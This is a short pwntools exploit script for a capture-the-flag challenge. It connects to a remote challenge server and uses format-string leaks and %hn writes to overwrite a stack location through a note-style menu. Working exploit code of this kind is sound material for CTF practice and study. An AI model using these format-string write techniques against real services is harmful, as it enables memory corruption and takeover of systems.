#!/usr/bin/env python3
from pwn import *
import warnings
warnings.filterwarnings("ignore")
exe = ELF("./strings_onlye")
libc = ELF("./libc.so.6")
ld = ELF("./ld-2.23.so")
# context.log_level='debug'
p = remote("chal.competitivecyber.club", 8888)
# p = process([exe.path])
def gdbs():
    context.terminal = ["foot"]
    gdb.attach(p, gdbscript="""

               """)
    # p = gdb.debug([exe.path],"""
    #
    #                 """)

sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
def add(size):
    sla(">","1")
    sla(">",str(size))
def edit(idx,data):
    sla(">","2")
    sla(">",str(idx))
    sla(">",data)
def show(idx):
    sla(">","3")
    sla(">",str(idx))
# gdbs()
add(0x40)
edit(0,"%15$p")
show(0)
addr = int(p.recvline(),16)
log.info(f"addr: {hex(addr)}")
target = addr - 240
stack = addr
log.info(f"target: {hex(target)}")
edit(0,f"%{target&0xffff}c%15$hn")
show(0)
edit(0,f"%{0xbabe}c%41$hn")
show(0)
edit(0,f"%{(target+2)&0xffff}c%15$hn")
show(0)
edit(0,f"%{0xcafe}c%41$hn")
show(0)



p.interactive()
# good luck pwning :)

